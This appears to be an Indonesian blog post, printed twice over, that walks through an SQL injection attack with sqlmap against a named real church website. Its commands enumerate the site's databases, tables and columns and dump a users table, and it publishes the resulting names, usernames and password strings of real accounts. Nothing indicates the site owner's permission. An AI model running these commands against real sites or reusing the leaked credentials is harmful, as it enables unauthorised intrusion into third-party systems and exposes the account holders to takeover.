kl ane pake Blackbuntu...
buka aja langsung..
Application >> Pentest >> Vulnerability Identification >> All >> SQL Map..
oke kl dah di buka kita mulai ..target kita adalah
http://fpchurch.org.uk/News/view.php?id=26
Silahkan di cek..
.kasih aja single-quot "`"
lansung command pertama.
.====
./sqlmap.py -o --url="http://fpchurch.org.uk/News/view.php?id=26" --dbs
====
penjelasan :
-o untuk mengoptimasi kerja sqlmap
--url adalah target URL yang akan dieksploitasi
--dbs adalah untuk memunculkan nama database yang ada
Hasil dr command yang menunjukan jumlah databasenya :
====
available databases [2]:
[*] fpchurch
[*] information_schema
====
SS : sini
setelah itu kita lihat isi dari databasenya :
=====
./sqlmap.py -o --url="http://fpchurch.org.uk/News/view.php?id=26" -D fpchurch --tables
=====
penjelasan :
-D adalah nama database yang akan dienumerasi
--tables adalah opsi untuk menampilkan table pada database yang tadi sudah kita tentukan
hasilnya keluar :
======
Database:
fpchurch [47 tables]
.......................
biblebook..............
sermonseries
users
=======
*Sebenarnya itu menunjukan ada 47 tabel dalam databasenya,tapi karena terlalu panjang maka ane ambil database yg penting2 aja..
Tips : carilah username dan pass di letak tabel yg sering ada (dlam kasus ini [ user ].
SS : sini
command selanjutnya unt mengetahui isi dar tabel itu yaitu columns nya adalah :
=====
./sqlmap.py -o --url="http://fpchurch.org.uk/News/view.php?id=26" -D fpchurch -T users --columns
=====
penjelasan :
--columns : mengetahui isi dari tabel itu
dan inilah hasil dari command itu :
========
Database: fpchurch
Table: users
[3 columns]
==========
SS : sini
sekarang waktunya kita bongkar isi username dan passwordnya...
./sqlmap.py -o --url="http://fpchurch.org.uk/News/view.php?id=26" -D fpchurch -T users --dump
=======
penjelasan :
--dump : unt mengeluarkan isi dari columns
====
dan inilah Hasil dr Dump columns tersebut :
===========
+------------------------+---------------+-----------+
| name | password | username |
+------------------------+---------------+-----------+
| James Macleod | fp258FDhdLDG6 | fpchurch |
| Aberdeen2 | Ab7D2fflvJ0mc | Aberdeen2 |
| Aberdeen Congregation | AbSg/i/9.1E8M | Aberdeen |
+------------------------+---------------+-----------+
=====================
SS : sini
REFERANSI : root-bt.co.cc
buka aja langsung..
Application >> Pentest >> Vulnerability Identification >> All >> SQL Map..
oke kl dah di buka kita mulai ..target kita adalah
http://fpchurch.org.uk/News/view.php?id=26
Silahkan di cek..
.kasih aja single-quot "`"
lansung command pertama.
.====
./sqlmap.py -o --url="http://fpchurch.org.uk/News/view.php?id=26" --dbs
====
penjelasan :
-o untuk mengoptimasi kerja sqlmap
--url adalah target URL yang akan dieksploitasi
--dbs adalah untuk memunculkan nama database yang ada
Hasil dr command yang menunjukan jumlah databasenya :
====
available databases [2]:
[*] fpchurch
[*] information_schema
====
SS : sini
setelah itu kita lihat isi dari databasenya :
=====
./sqlmap.py -o --url="http://fpchurch.org.uk/News/view.php?id=26" -D fpchurch --tables
=====
penjelasan :
-D adalah nama database yang akan dienumerasi
--tables adalah opsi untuk menampilkan table pada database yang tadi sudah kita tentukan
hasilnya keluar :
======
Database:
fpchurch [47 tables]
.......................
biblebook..............
sermonseries
users
=======
*Sebenarnya itu menunjukan ada 47 tabel dalam databasenya,tapi karena terlalu panjang maka ane ambil database yg penting2 aja..
Tips : carilah username dan pass di letak tabel yg sering ada (dlam kasus ini [ user ].
SS : sini
command selanjutnya unt mengetahui isi dar tabel itu yaitu columns nya adalah :
=====
./sqlmap.py -o --url="http://fpchurch.org.uk/News/view.php?id=26" -D fpchurch -T users --columns
=====
penjelasan :
--columns : mengetahui isi dari tabel itu
dan inilah hasil dari command itu :
========
Database: fpchurch
Table: users
[3 columns]
+----------+-------------+
| Column | Type |
+----------+-------------+
| name | varchar(45) |
| password | varchar(45) |
| username | varchar(45) |
+----------+-------------+
==========
SS : sini
sekarang waktunya kita bongkar isi username dan passwordnya...
./sqlmap.py -o --url="http://fpchurch.org.uk/News/view.php?id=26" -D fpchurch -T users --dump
=======
penjelasan :
--dump : unt mengeluarkan isi dari columns
====
dan inilah Hasil dr Dump columns tersebut :
===========
+------------------------+---------------+-----------+
| name | password | username |
+------------------------+---------------+-----------+
| James Macleod | fp258FDhdLDG6 | fpchurch |
| Aberdeen2 | Ab7D2fflvJ0mc | Aberdeen2 |
| Aberdeen Congregation | AbSg/i/9.1E8M | Aberdeen |
+------------------------+---------------+-----------+
=====================
SS : sini
REFERANSI : root-bt.co.cc
0 komentar:
Posting Komentar